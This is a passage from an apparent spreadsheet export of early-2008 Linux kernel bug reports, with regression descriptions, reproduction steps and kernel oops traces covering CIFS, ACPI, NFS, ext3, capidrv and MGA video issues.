[&lt;ffffffff80336d6a&gt;] blk_execute_rq+0x8a/0x100 [ 40.158686] [&lt;ffffffff803347e5&gt;] get_request+0x155/0x2d0 [ 40.158690] [&lt;ffffffff803f7d64&gt;] scsi_execute+0xe4/0x120 [ 40.158692] [&lt;ffffffff803f7e31&gt;] scsi_execute_req+0x91/0x100 [ 40.158697] [&lt;ffffffff8800b70b&gt;] :sr_mod:sr_probe+0x21b/0x630 [ 40.158700] [&lt;ffffffff802fa0a9&gt;] sysfs_create_link+0xa9/0x150 [ 40.158703] [&lt;ffffffff805620a5&gt;] klist_next+0x35/0xe0 [ 40.158706] [&lt;ffffffff803c34cc&gt;] driver_probe_device+0x9c/0x1b0 [ 40.158709] [&lt;ffffffff803c37b1&gt;] __driver_attach+0xe1/0xf0 [ 40.158711] [&lt;ffffffff803c36d0&gt;] __driver_attach+0x0/0xf0 [ 40.158714] [&lt;ffffffff803c26bd&gt;] bus_for_each_dev+0x4d/0x80 [ 40.158717] [&lt;ffffffff803c2acf&gt;] bus_add_driver+0xaf/0x220 [ 40.158721] [&lt;ffffffff8801102c&gt;] :sr_mod:init_sr+0x2c/0x47 [ 40.158724] [&lt;ffffffff80267856&gt;] sys_init_module+0x196/0x1a20 [ 40.158729] [&lt;ffffffff8020bdee&gt;] system_call+0x7e/0x83 [ 40.158732] ----------/CUT------------- my .config is attached. Trying to reproduce now.</t>
  </si>
  <si>
    <t>return code -22 when cifs mount is used mounting win2003 from Linux machine booted with 2.6.23 kernel. No issues when 2.6.19 is used</t>
  </si>
  <si>
    <t>2008-01-02 12:40 UTC</t>
  </si>
  <si>
    <t>2008-09-26 07:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.19 Distribution: vanilla Hardware Environment: any Software Environment: using mount binary 2.11y samba package 3.0.24 (Is there a dependency for kernel 2.6.23 on specific samba package) Problem Description: mount command failing with return code -22. The issue is not present when using 2.6.19 Steps to reproduce: mount -t cifs //myserver/mywindowshare /mnt/mymountpoint -o username=myusername,password=mypassword</t>
  </si>
  <si>
    <t>aio_rw_vect_retry() should return partial write</t>
  </si>
  <si>
    <t>2008-01-03 11:58 UTC</t>
  </si>
  <si>
    <t>2008-06-05 00:22 UTC</t>
  </si>
  <si>
    <t>Rusty rightly pointed out that aio_rw_vect_retry() should return partial progress, but he failed to take -EIOCB* into account. This is just a reminder to make sure that the slightly fixed patch makes it in. http://lkml.org/lkml/2008/1/3/56</t>
  </si>
  <si>
    <t>max_cstate VMware regression</t>
  </si>
  <si>
    <t>2008-01-03 14:54 UTC</t>
  </si>
  <si>
    <t>2008-01-13 23:08 UTC</t>
  </si>
  <si>
    <t>Subject : max_cstate VMware regression Submitter : Mark Lord &lt;lkml@rtr.ca&gt; References : http://lkml.org/lkml/2008/1/2/328 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt;</t>
  </si>
  <si>
    <t>ACPI: fix acpi fan state set error</t>
  </si>
  <si>
    <t>2,6.24-rc6</t>
  </si>
  <si>
    <t>2008-01-04 00:10 UTC</t>
  </si>
  <si>
    <t>2008-10-16 23:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: FC8 Hardware Environment: All Software Environment: All Problem Description:Under /proc/acpi, there is a fan control interface, a user can set 0 or 3 to /proc/acpi/fan/*/state, 0 denotes D0 state, 3 denotes D3 state, but in current implementation, a user can set a fan to D1 state by any char excluding '1', '2' and '3'. For example: [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: on [root@localhost acpi]# echo "3" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "xxxxx" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: on Obviously, such inputs as "" and "xxxxx" are invalid for fan state. Steps to reproduce: [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: on [root@localhost acpi]# echo "3" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "xxxxx" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: on [root@localhost acpi]# echo "3" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "3x" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: off [root@localhost acpi]# echo "-1x" &gt; /proc/acpi/fan/C31B/state [root@localhost acpi]# cat /proc/acpi/fan/C31B/state status: on [root@localhost acpi]#</t>
  </si>
  <si>
    <t>remote control not working for the leadtek winfast 2000 xp rm tv tuner</t>
  </si>
  <si>
    <t>2008-01-05 06:17 UTC</t>
  </si>
  <si>
    <t>Stefan Talpalaru</t>
  </si>
  <si>
    <t>2008-01-27 02:32 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: leadtek winfast 2000 xp rm - a PCI tv tuner Problem Description: the remote is not working w/o this patch: http://marc.info/?l=linux-video&amp;m=116362609323281&amp;w=2</t>
  </si>
  <si>
    <t>rmmod capidrv makes kernel oops and never returns</t>
  </si>
  <si>
    <t>2008-01-05 14:03 UTC</t>
  </si>
  <si>
    <t>2008-04-29 11:52 UTC</t>
  </si>
  <si>
    <t>Jike Song</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: don`t know Distribution: OpenSuSE 10.3 + vanilla kernel 2.6.24rc6 Hardware Environment: fsc lifebook e-series (happens both on real hw and inside vmware) Software Environment: ??? Problem Description: modprobe capidrv;rmmod capidrv rmmod never returns [ 7358.883208] capidrv: Rev 1.1.2.2 : unloaded [ 7358.895698] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000009 [ 7358.896132] printing eip: c020ceea *pde = 00000000 [ 7358.896512] Oops: 0000 [#1] SMP [ 7358.896844] Modules linked in: capidrv kernelcapi isdn slhc edd iptable_filter ip_tables ip6table_filter ip6_tables x_tables ipv6 af_packet microcode firmware_class fuse loop dm_mod ide_cd cdrom pata_acpi 8250_pnp ata_piix ahci ata_generic libata parport_pc parport floppy 8250 rtc_cmos serial_core rtc_core rtc_lib pcnet32 mii pcspkr hci_usb piix bluetooth generic i2c_piix4 ide_core i2c_core container shpchp pci_hotplug ac thermal power_supply button processor intel_agp agpgart sg mousedev evdev ext3 jbd mbcache sd_mod mptspi mptscsih mptbase ehci_hcd uhci_hcd scsi_transport_spi scsi_mod usbcore [ 7358.903430] [ 7358.903462] Pid: 4466, comm: kstopmachine Not tainted (2.6.24-rc6 #1) [ 7358.905436] EIP: 0060:[&lt;c020ceea&gt;] EFLAGS: 00010092 CPU: 0 [ 7358.906712] EIP is at list_del+0xa/0x61 [ 7358.906769] EAX: e0b39704 EBX: 00000009 ECX: 00000000 EDX: de4e4e10 [ 7358.906819] ESI: df6b8ef0 EDI: 00000000 EBP: de4a2fb4 ESP: de4a2fa4 [ 7358.906863] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 7358.907431] Process kstopmachine (pid: 4466, ti=de4a2000 task=de4e4e10 task.ti=de4a2000) [ 7358.907463] Stack: c03f80ac 00000046 00000000 00000008 de4a2fbc c0153506 de4a2fd0 c015fb58 [ 7358.907492] df6b8ef0 c015fa9c 00000000 de4a2fe0 c013fe7e c013fe43 00000000 00000000 [ 7358.909431] c0108d77 df6b8e6c 00000000 00000000 00000000 00000000 00000000 [ 7358.909649] Call Trace: [ 7358.911432] [&lt;c01091cd&gt;] show_trace_log_lvl+0x1a/0x2f [ 7358.911492] [&lt;c010927d&gt;] show_stack_log_lvl+0x9b/0xa3 [ 7358.911539] [&lt;c010932c&gt;] show_registers+0xa7/0x179 [ 7358.911575] [&lt;c0109538&gt;] die+0x13a/0x225 [ 7358.911602] [&lt;c02ed731&gt;] do_page_fault+0x554/0x632 [ 7358.915172] [&lt;c02ebd72&gt;] error_code+0x72/0x78 [ 7358.915172] [&lt;c0153506&gt;] __unlink_module+0xb/0xf [ 7358.915172] [&lt;c015fb58&gt;] do_stop+0xbc/0x110 [ 7358.915172] [&lt;c013fe7e&gt;] kthread+0x3b/0x61 [ 7358.915172] [&lt;c0108d77&gt;] kernel_thread_helper+0x7/0x10 [ 7358.915172] ======================= [ 7358.915432] Code: 00 00 8b 53 10 8d 4b 0c 8d 46 0c e8 72 00 00 00 89 f8 e8 87 fe ff ff 83 c4 10 5b 5e 5f 5d c3 90 90 55 89 e5 53 83 ec 0c 8b 58 04 &lt;8b&gt; 0b 39 c1 74 18 89 4c 24 08 89 44 24 04 c7 04 24 a7 43 39 c0 [ 7358.917433] EIP: [&lt;c020ceea&gt;] list_del+0xa/0x61 SS:ESP 0068:de4a2fa4 [ 7358.919433] ---[ end trace a35f9be43025b578 ]--- Steps to reproduce: power up vanilla kernel built with &gt;allmodconfig&lt; or use suse distro kernel from http://ftp.suse.com/pub/projects/kernel/kotd/HEAD/i386/ then do modprobe capidrv;rmmod capidrv (don`t need any isdn hardware for that)</t>
  </si>
  <si>
    <t>arch/arm/mach-at91/board-ek.c compile error</t>
  </si>
  <si>
    <t>2008-01-05 14:49 UTC</t>
  </si>
  <si>
    <t>2008-01-11 13:21 UTC</t>
  </si>
  <si>
    <t>Commit f230d3f53d72d05bcb5666ab7e2eccd49c8b3a15 causes the following compile error with at91rm9200ek_defconfig: &lt;-- snip --&gt; ... CC arch/arm/mach-at91/board-ek.o /home/bunk/linux/kernel-2.6/git/linux-2.6/arch/arm/mach-at91/board-ek.c: In function 'ek_board_init': /home/bunk/linux/kernel-2.6/git/linux-2.6/arch/arm/mach-at91/board-ek.c:148: error: 'ek_i2c_devices' undeclared (first use in this function) ... make[2]: *** [arch/arm/mach-at91/board-ek.o] Error 1 &lt;-- snip --&gt;</t>
  </si>
  <si>
    <t>radio-sf16fmr2 probably buggy - system inconsistent after probe</t>
  </si>
  <si>
    <t>radio</t>
  </si>
  <si>
    <t>2008-01-05 15:08 UTC</t>
  </si>
  <si>
    <t>2008-01-12 03:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: not known Distribution: OpenSuSE 10.3 with suse kernel &amp; vanilla 2.6.24rc6, grml (live-cd) daily build Hardware Environment: running inside VMware Workstation 6.x on FSC Lifebook e-series, running native on older FSC Lifebook Software Environment: ??? Problem Description: loading radio-sf16fmr2 on a system without that hardware leaves the system in an inconsistent state after probe, leading to weird behaviour or even system crash Steps to reproduce: either: opensuse103:~ # modprobe radio-sf16fmr2 FATAL: Error inserting radio_sf16fmr2 (/lib/modules/2.6.24-rc6/kernel/drivers/media/radio/radio-sf16fmr2.ko): Device or resource busy opensuse103:~ # cat /proc/ioports Segmentation fault or: opensuse103:~ # modprobe radio-sf16fmr2 FATAL: Error inserting radio_sf16fmr2 (/lib/modules/2.6.24-rc6/kernel/drivers/media/radio/radio-sf16fmr2.ko): Device or resource busy opensuse103:~ # modprobe esp &lt;system freeze&gt; dmesg after cat /proc/ioports: fmr2: port 0x384 already in use BUG: unable to handle kernel paging request at virtual address e09e467a printing eip: c01d6c8e *pde = 1f41b067 *pte = 00000000 Oops: 0000 [#1] SMP Modules linked in: videodev v4l2_common v4l1_compat compat_ioctl32 edd iptable_filter ip_tables ip6table_filter ip6_tables x_tables ipv6 af_packet microcode firmware_class fuse loop dm_mod ide_cd cdrom pata_acpi ata_piix ahci ata_generic libata container piix pcnet32 thermal generic shpchp mii ac intel_agp parport_pc pci_hotplug processor ide_core i2c_piix4 parport rtc_cmos agpgart power_supply button rtc_core i2c_core rtc_lib sg ext3 jbd mbcache sd_mod ehci_hcd mptspi mptscsih mptbase uhci_hcd scsi_transport_spi scsi_mod usbcore Pid: 2551, comm: cat Not tainted (2.6.24-rc6-vanilla+suseconfig #11) EIP: 0060:[&lt;c01d6c8e&gt;] EFLAGS: 00010297 CPU: 0 EIP is at strnlen+0x6/0x18 EAX: e09e467a EBX: e09e467a ECX: e09e467a EDX: fffffffe ESI: dec4f15e EDI: dee89f10 EBP: ffffffff ESP: dee89e88 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process cat (pid: 2551, ti=dee88000 task=dea14e70 task.ti=dee88000) Stack: c01d63d6 00000000 00000000 00000010 00000004 ffffffff 00000001 00000eae dec4f152 00000010 dec50000 00000000 ffffffff c03233cb dec4f152 de82ac80 de82ac80 00000400 c018a6b2 dee89ef0 dee89ef0 00000000 c0368774 c012ab4c Call Trace: [&lt;c01d63d6&gt;] vsnprintf+0x29c/0x469 [&lt;c018a6b2&gt;] seq_printf+0x2e/0x4b [&lt;c012ab4c&gt;] r_show+0x7f/0x88 [&lt;c018ac63&gt;] seq_read+0x1a1/0x27e [&lt;c018aac2&gt;] seq_read+0x0/0x27e [&lt;c01a1125&gt;] proc_reg_read+0x5e/0x71 [&lt;c01a10c7&gt;] proc_reg_read+0x0/0x71 [&lt;c017557a&gt;] vfs_read+0x9f/0x127 [&lt;c017596f&gt;] sys_read+0x41/0x67 [&lt;c0104f52&gt;] sysenter_past_esp+0x6b/0xa9 ======================= Code: c9 74 0c f2 ae 74 05 bf 01 00 00 00 4f 89 fa 5f 89 d0 c3 85 c9 57 89 c7 89 d0 74 05 f2 ae 75 01 4f 89 f8 5f c3 89 c1 89 c8 eb 06 &lt;80&gt; 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 c3 90 90 90 57 83 c9 EIP: [&lt;c01d6c8e&gt;] strnlen+0x6/0x18 SS:ESP 0068:dee89e88 ---[ end trace 598964de8ea8972c ]---</t>
  </si>
  <si>
    <t>hostap_cs_{resume,suspend}(): inconsequent NULL checking</t>
  </si>
  <si>
    <t>2008-01-05 19:42 UTC</t>
  </si>
  <si>
    <t>2008-07-10 23:20 UTC</t>
  </si>
  <si>
    <t>The Coverity checker spotted the following in drivers/net/wireless/hostap/hostap_cs.c: &lt;-- snip --&gt; ... static int hostap_cs_suspend(struct pcmcia_device *link) { struct net_device *dev = (struct net_device *) link-&gt;priv; int dev_open = 0; struct hostap_interface *iface = NULL; if (dev) iface = netdev_priv(dev); PDEBUG(DEBUG_EXTRA, "%s: CS_EVENT_PM_SUSPEND\n", dev_info); if (iface &amp;&amp; iface-&gt;local) dev_open = iface-&gt;local-&gt;num_dev_open &gt; 0; if (dev_open) { netif_stop_queue(dev); netif_device_detach(dev); } prism2_suspend(dev); return 0; } static int hostap_cs_resume(struct pcmcia_device *link) { struct net_device *dev = (struct net_device *) link-&gt;priv; int dev_open = 0; struct hostap_interface *iface = NULL; if (dev) iface = netdev_priv(dev); PDEBUG(DEBUG_EXTRA, "%s: CS_EVENT_PM_RESUME\n", dev_info); if (iface &amp;&amp; iface-&gt;local) dev_open = iface-&gt;local-&gt;num_dev_open &gt; 0; prism2_hw_shutdown(dev, 1); prism2_hw_config(dev, dev_open ? 0 : 1); if (dev_open) { netif_device_attach(dev); netif_start_queue(dev); } return 0; } ... &lt;-- snip --&gt; If the "if (dev)" is false then there's a guaranteed NULL dereference later in the "prism2_suspend(dev)" resp. "prism2_hw_config(dev, dev_open ? 0 : 1)".</t>
  </si>
  <si>
    <t>ACPI: processor throttling set error</t>
  </si>
  <si>
    <t>2008-01-06 23:36 UTC</t>
  </si>
  <si>
    <t>2008-07-16 15:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: FC8 Hardware Environment: All Software Environment: All Problem Description: When echo some invalid values to /proc/acpi/processor/*/throttling, there isn't any error info returned, on the contray, it sets throttling value to some T* successfully, obviously, this is incorrect, a correct way should be to let it fail and return error info. Steps to reproduce: [root@localhost /]# echo "2xxxx" &gt; /proc/acpi/processor/CPU0/throttling [root@localhost /]# cat /proc/acpi/processor/CPU0/throttling state count: 8 active state: T2 state available: T0 to T7 states: T0: 100% T1: 87% *T2: 75% T3: 62% T4: 50% T5: 37% T6: 25% T7: 12% [root@localhost /]# echo "" &gt; /proc/acpi/processor/CPU0/throttling [root@localhost /]# cat /proc/acpi/processor/CPU0/throttling state count: 8 active state: T0 state available: T0 to T7 states: *T0: 100% T1: 87% T2: 75% T3: 62% T4: 50% T5: 37% T6: 25% T7: 12% [root@localhost /]# echo "7xxx" &gt; /proc/acpi/processor/CPU0/throttling [root@localhost /]# cat /proc/acpi/processor/CPU0/throttling state count: 8 active state: T7 state available: T0 to T7 states: T0: 100% T1: 87% T2: 75% T3: 62% T4: 50% T5: 37% T6: 25% *T7: 12% [root@localhost /]#</t>
  </si>
  <si>
    <t>powersave governor does not scale down when power gets connected</t>
  </si>
  <si>
    <t>2.6.24-rc6 (at least) to  2.6.25-rc6</t>
  </si>
  <si>
    <t>2008-01-07 13:11 UTC</t>
  </si>
  <si>
    <t>Helge Deller</t>
  </si>
  <si>
    <t>2008-06-04 23:41 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: HP NC6000 Laptop (Intel(R) Pentium(R) M processor 1.60GHz) Problem Description: cpufreq powermanagemnt does work pretty ok. Nevertheless, I face a problem when I suddenly plug in the power cable. Machine has no load, nevertheless I then can see (even minutes after I plugged in the power cable): [root@halden cpufreq]# uptime &amp;&amp; grep "" /sys/devices/system/cpu/cpu0/cpufreq/* 21:57:23 up 1:04, 3 users, load average: 0.09, 0.08, 0.09 /sys/devices/system/cpu/cpu0/cpufreq/affected_cpus:0 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq:1600000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq:1600000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq:600000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies:1600000 1400000 1200000 1000000 800000 600000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors:conservative ondemand powersave userspace performance /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq:1600000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver:acpi-cpufreq /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq:1600000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq:600000 As you can see, the CPU can scale between 600 MHz and 1600 MHz. The governour is "powersave", but scaling_cur_freq constantly stays at 1600 MHz. In principle the powersave governour should now scale it down to 600 MHz, but it does not. Interestingly, when I then switch the scaling governor to "performance" (or any other value than powersave) and then directly back to powersave, it then suddenly does work as designed and scales the CPU down to 600MHz. It seems the short change in the governor triggers start of the scale-down.</t>
  </si>
  <si>
    <t>MGA video modes garbled</t>
  </si>
  <si>
    <t>2.6.23-rc3 through 2.6.24-rc7</t>
  </si>
  <si>
    <t>2008-01-07 16:24 UTC</t>
  </si>
  <si>
    <t>Damon</t>
  </si>
  <si>
    <t>2010-01-19 22:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23-rc2 Earliest failing kernel version: 2.6.23-rc3 Latest failing kernel version tried: 2.6.24-rc7 Distribution: None (self-built) Hardware Environment: - Athlon XP - Matrox millenium G550 AGP video - LCD monitor which needs to be driven at a vertical refresh rate of 60Hz. Software Environment: - Xorg server 1.2.0 - Kernel drivers mga, drm, via_agp, agpgart. Problem Description: I have had the following problem since i first upgraded to the 2.6.23 series. I have since gone back and determined that the relevant change occurred between 2.6.23-rc2 (works) and 2.6.23-rc3 (doesn't work). I have also tested 2.6.24-rc7 and the problem still exists there. I have an LCD monitor that needs to be driven at a vertical refresh rate of 60Hz. I have Xorg configured to require VertRefresh 60 for the monitor, and in the past it has always successfully auto-detected appropriate, compatible modes on the matrox card as follows (as reported by the monitor's info panel): 1600x1200: horiz 75KHz, vert 60Hz, pixclock 162MHz 1280x1024: horiz 63KHz, vert 60Hz, pixclock 109MHz 1024x768: horiz 48KHz, vert 60Hz, pixclock 65MHz 800x600: horiz 37KHz, vert 60Hz, pixclock 40MHz 640x480: horiz 31KHz, vert 60Hz, pixclock 25MHz Since 2.6.23-rc3, when I start Xorg, my monitor reports that the signal is out of range. If i use the C-M-keypad combinations to select a different video mode, most are still out of range, one is shaky, and only one is solid. My monitor won't report anything for the ones that are out of range, but here are the two i can see: 1280x1024: horiz 57KHz, vert 54Hz, pixclock 98MHz (shaky) 1024x768: horiz 48KHz, vert 60Hz, pixclock 65MHz (same as above) I have also witnessed similar effects on my other machines, all of which have a similar setup. Most of them have more forgiving display devices, but i still see problems with the refresh rate. The Xorg log files are essentially identical between the two kernels. I'm attaching the relevant parts of Xorg's log (grep MGA). Xorg seems to be finding the correct values, on both kernels, but what comes out the other en changes radically from one RC to the next. I'm also attaching the contents of /proc/config.gz under 2.6.23-rc2. The same configuration was also used for 2.6.23-rc3. I see from the incremental patch that a bunch of changes were made in the MGA drivers relating to pixel clocks; unfortunately it's meaningless to me. Please let me know if (and how) there's any more useful information i can provide. Thanks!</t>
  </si>
  <si>
    <t>kernel BUG in shrink_dcache_for_umount_subtree at shutdown</t>
  </si>
  <si>
    <t>2008-01-07 16:40 UTC</t>
  </si>
  <si>
    <t>2008-06-04 23:35 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: Unknown Distribution: None (self-built) Hardware Environment: - Athlon / Athlon XP CPU - what other information is relevant? Software Environment: - kernel 2.6 - nfs-utils-1.1.1 (also occurred with older versions) - using NFSv3 mounts Problem Description: I have a simple home network NFS setup. Client machines mount an NFSv3 home partition from a central server. For a long time (i've no real recollection of when it started, but it's been at least a couple of years) when i shut down one of the client machines, it almost always hangs just before the final halt with the following kernel BUG report. I've also seen soemthing similar one one other client, which is an older athlon from before the XP series. The other athlon XP client never displays this problem. I always assumed this must have something to do with the NFS partition not unmounting cleanly - after all it is the home partition, and something always seems to keep it open. However, surely this shouldn't be causing a kernel bug? and i would expect it to be consistent between the two similar machines. After this message is displayed, the console is unresponsive. However, kernel messages are still printed (i get a warning from lockd about the nfs server not responding, still trying), and the screen will blank due to activity. Pressing a key still restores the screen after it blanks. The only way i've found to power down past this point is with the power button. I'm also attaching the kernel configuration currently used for both the client and the server. The configuration has changed over the years that the problem has been going on, but not radically. ----------- [ cut here ] ----------- kernel BUG at .../linux-2.6.22.15/fs/dcache.c:652! invalid opcode: 000 [#1] PREEMPT Modules linked in: mga drm nfs lockd nfs_acl sunrpc nls_iso8859_1 ntfs via_rhine via_agp agpgart evdev loop asb100 hwmon_vid hwmon i2c_viapro i2c_core snd_seq snd_cmipci gameport snd_pcm snd_page_alloc snd_opl3_lib snd_timer snd_hwdep snd_mpu401_uart snd_rawmidi snd_seq_device snd 8139too mii ide_cd cdrom configfs CPU: 0 EIP: 0060:[&lt;c017246f7&gt;] Not tainted VLI EFLAGS: 00010292 (2.6.22.15 #2) EIP is at shrink_dcache_for_umount_subtree+0x22f/0x260 eax: 00000051 ebx: dc472b3c ecx: ffffffff edx: dc550000 esi: dc472ae4 edi: e62b4528 ebp: 014003b0 esp: dc551ecc ds: 007b es: 007b fs: 0000 gs: 0033 ss: 0068 Process umount.nfs (pid: 13550, ti=dc550000 task=e06c15d0 task.ti=dc550000) Stack: c038cf40 dc472ae4 014003b0 dc472b3c 00000001 eaa92699 e62b4528 00000376 e62b4400 e62b4400 e7fef120 e62b4400 c0172d36 eaa91120 c0162268 00040000 00000282 00000011 eaaa90a0 c0162389 e61d2980 eaa732dc e62b4400 c0162455 Call trace: [&lt;c0172d36&gt;] shrink_dcache_for_umount+0x36/0x50 [&lt;c0162268&gt;] generic_shutdown_super+0x18/0x110 [&lt;c0162389&gt;] kill_anon_super+0x9/0x40 [&lt;eaa732dc&gt;] nfs_kill_super+0xc/0x20 [nfs] [&lt;c0162455&gt;] deactivate_super+0x75/0xa0 [&lt;c0177546&gt;] sys_umount+0x46/0x230 [&lt;c0237c50&gt;] tty_write+0x1a0/0x1e0 [&lt;c0160cd1&gt;] vfs_write+0x101/0x140 [&lt;c0177747&gt;] sys_oldumount+0x17/0x20 [&lt;c01029c2&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 8b 00 74 03 8b 6a 20 89 7c 24 18 89 4c 24 10 89 5c 24 0c 89 6c 24 08 89 74 24 04 89 44 24 14 c7 04 24 40 cf 38 c0 e8 61 59 fa ff &lt;0f&gt; 0b eb fe 0f 0b eb fe 0f 0b eb fe 83 c4 20 5b 5e 5f 5d e9 0d 83 1b 00 e8 EIP: [&lt;c017246f&gt;] shrink_dcache_for_umount_subtree+0x22f/0x260 SS:ESP 0068:dc551ecc</t>
  </si>
  <si>
    <t>BUG in current NFS4 code makes the system unusable</t>
  </si>
  <si>
    <t>2.6.24-rc6-git10</t>
  </si>
  <si>
    <t>2008-01-07 23:41 UTC</t>
  </si>
  <si>
    <t>2008-01-11 16:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-rc6-git9 Earliest failing kernel version: 2.6.24-rc6-git10 Distribution: Debian GNU/Linux 4.0/Etch Hardware Environment: x86_64, diskless workstation Software Environment: NFS4(krb5i) /home of users Problem Description: I've noticed there is a bug in the current commit to -rc6-git10 e6e21970baff4845de74584e2efc8c964a55d574 (NFSv4: Fix open_to_lock_owner sequenceid allocation...) Here, the /home of users is shared between machines via nfs4 mounts from server. The code leads to an unusable system within ~10 mins when running some file hungry app like firefox. The app seem to hang, as every other process which accesses an nfs4 mountpoint. The behavior is reproducible here at least on 2 x86_64 boxes. I haven't tried an x86 box yet. Unapplying this commit removes the described effect.</t>
  </si>
  <si>
    <t>kernel BUG at fs/buffer.c:1245!</t>
  </si>
  <si>
    <t>2008-01-08 11:39 UTC</t>
  </si>
  <si>
    <t>2008-01-14 15:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: 2.6.23 Distribution:Kernel from kernel.org Hardware Environment: Dual QUAD core i386 Software Environment: Embedded system Problem Description: File system access, sometimes reaults in this oops. Steps to reproduce: Bug happens during reboot, or some times during file close. Crash data : kernel BUG at fs/buffer.c:1245! invalid opcode: 0000 [#1] SMP Modules linked in: iptable_filter ip_tables x_tables e1000 adm1026 hwmon_vid pld_drv CPU: 2 EIP: 0060:[&lt;c0186aa6&gt;] Not tainted VLI EFLAGS: 00010002 (2.6.23.IPSO-LX-7.2-ALPHA05 #4) EIP is at lookup_bh_lru+0x21/0x88 Jan 8 17:23:14 eax: 00000001 ebx: 00001000 ecx: 00000000 edx: 00020002 esi: 00020002 edi: 00020002 ebp: 00000000 esp: f7653e18 ds: 007b es: 007b fs: 00d8 gs: 0000 ss: 0068 Process httpd (pid: 5558, ti=f7652000 task=c3ec0fc0 task.ti=f7652000) Stack: 00000000 f74a1380 00001000 00020002 00000000 f74a1380 c0186b26 00001000 00001000 00020002 00000000 f74a1380 c0186b6b 00001000 00001000 00000000 f5c589f8 00000001 c01c8fa3 00001000 00000001 00000002 00000006 00000000 Call Trace: [&lt;c0186b26&gt;] __find_get_block+0x19/0x45 [&lt;c0186b6b&gt;] __getblk+0x19/0x40 [&lt;c01c8fa3&gt;] __ext3_get_inode_loc+0x52/0x223 [&lt;c01c99f2&gt;] ext3_reserve_inode_write+0x19/0x5d [&lt;c01cc702&gt;] localhost [emergext3_orphan_del+0x73/0x14b [&lt;c01d3e92&gt;] journal_start+0x86/0xb2 ] ------------[ [&lt;c01232c5&gt;] __wake_up+0x32/0x43 [&lt;c0186336&gt;] invalidate_inode_buffers+0xe/0x99 [&lt;c01c6800&gt;] ext3_delete_inode+0x0/0xc1 [&lt;c01c6881&gt;] ext3_delete_inode+0x81/0xc1 [&lt;c01c6800&gt;] ext3_delete_inode+0x0/0xc1 [&lt;c017b801&gt;] generic_delete_inode+0x5b/0xc0 c ut here ]-----[&lt;c017b9eb&gt;] iput+0x5b/0x5d [&lt;c0178ecf&gt;] d_kill+0x2d/0x41 [&lt;c0178fc2&gt;] dput+0xdf/0xeb [&lt;c016c19c&gt;] __fput+0x12a/0x152 [&lt;c016ac39&gt;] filp_close+0x4d/0x54 [&lt;c0129797&gt;] close_files+0x46/0x5a [&lt;c01297e4&gt;] put_files_struct+0x15/0x3d [&lt;c012a13d&gt;] do_exit+0x1ee/0x35d [&lt;c012a338&gt;] sys_exit_group+0x0/0xd [&lt;c0104e0e&gt;] syscall_call+0x7/0xb [&lt;c03f0000&gt;] svc_tcp_data_ready+0x26/0x68 ======================= Code: ff ff 83 c4 24 5b 5e 5f 5d c3 55 57 89 d7 56 53 55 55 89 cd 89 44 24 04 c7 04 24 00 00 00 00 9c 58 c1 e8 09 83 f0 01 a8 01 74 04 &lt;0f&gt; 0b eb fe fa b8 20 a3 60 c0 31 db 64 8b 15 04 91 60 c0 8d 34 EIP: [&lt;c0186aa6&gt;] lookup_bh_lru+0x21/0x88 SS:ESP 0068:f7653e18 Entering kdb (current=0xc3ec0fc0, pid 5558) on processor 2 Oops: invalid opcode due to oops @ 0xc0186aa6 eax = 0x00000001 ebx = 0x00001000 ecx = 0x00000000 edx = 0x00020002 esi = 0x00020002 edi = 0x00020002 esp = 0xf7653e18 eip = 0xc0186aa6 ebp = 0x00000000 xss = 0xc0380068 xcs = 0x00000060 eflags = 0x00010002 xds = 0x23c5007b xes = 0x0000007b origeax = 0xffffffff &amp;regs = 0xf7653de0 [2]kdb&gt;</t>
  </si>
  <si>
    <t>ext3 oops on unmount of corrupted image</t>
  </si>
  <si>
    <t>2.6.24-rc7-gcdf71a10</t>
  </si>
  <si>
    <t>2008-01-09 07:34 UTC</t>
  </si>
  <si>
